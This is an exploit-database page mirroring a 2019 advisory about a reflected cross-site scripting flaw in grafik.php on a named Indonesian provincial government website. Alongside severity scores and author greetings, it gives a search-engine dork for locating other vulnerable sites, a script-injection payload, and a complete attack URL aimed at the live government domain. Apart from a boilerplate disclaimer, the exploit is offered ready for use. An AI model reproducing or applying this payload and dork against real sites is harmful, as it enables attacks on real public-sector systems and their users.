Advertisement






KALIMATAN GOVERNMENT Grafik.php - XSS Vulnerability

CVE Category Price Severity
Unknown CWE-79 $500 High
Author Risk Exploitation Type Date
Unknown High Remote 2019-02-01
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:H 0.02393 0.62533

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2019020002

Below is a copy:

KALIMATAN GOVERNMENT Grafik.php - XSS Vulnerability
====================================================================================================================================
| # Title     : KALIMATAN GOVERNMENT Grafik.php - XSS Vulnerability                                                                |
| # Author    : indoushka                                                                                                          |
| # Tested on : windows 10 Franais V.(Pro) / browser : Mozilla firefox 64.0.2 (32-bit)                                            | 
| # Vendor    : http://teppa.kaltimprov.go.id/                                                                                     |  
| # Dork      : inurl:/front/grafik.php?tahun=                                                                                     |
====================================================================================================================================


poc :

[+] Dorking n Google Or Other Search Enggine.

[+] use payload : <script>alert(/indoushka/);</script>

[+] http://teppa.kaltimprov.go.id/front/grafik.php?tahun=2018&bulan=%3Cscript%3Ealert(/indoushka/);%3C/script%3E 


Greetings to :=========================================================================================================================
                                                                                                                                      |
jericho * Larry W. Cashdollar * brutelogic* shadow_00715* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * ViRuS_Ra3cH * yasMouh   |        
                                                                                                                                      |
=======================================================================================================================================

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum